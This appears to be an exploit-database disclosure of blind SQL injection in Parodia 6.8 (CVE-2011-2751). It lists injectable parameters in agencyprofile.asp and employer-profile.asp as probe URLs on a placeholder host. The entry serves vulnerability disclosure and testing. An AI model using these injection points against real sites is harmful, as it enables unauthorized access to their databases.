Parodia 6.8 - 'employer-profile.asp' SQL Injection
Author: Carlos Mario Penagos Hollmann type: webapps platform: asp port: date_added: 2012-06-25 date_updated: 2012-07-05 verified: 1 codes: CVE-2011-2751;OSVDB-83435;OSVDB-83434;OSVDB-73478 tags: aliases: screenshot_url: application_url: raw file: 19394.txt
# Exploit Title: Parodia 6.8 and early SQL injection # Date: June 24 2012 # Exploit Author:Carlos Mario Penagos Hollmann # Vendor Homepage: http://www.parodia.net/ # Version: 6.8 # CVE : CVE-2011-2751 http://server/' ---> blind SQL http://server/agencyprofile.asp?AG_ID=' http://server/employer-profile.asp?ag_id=' There are other SQL Blind injections ;)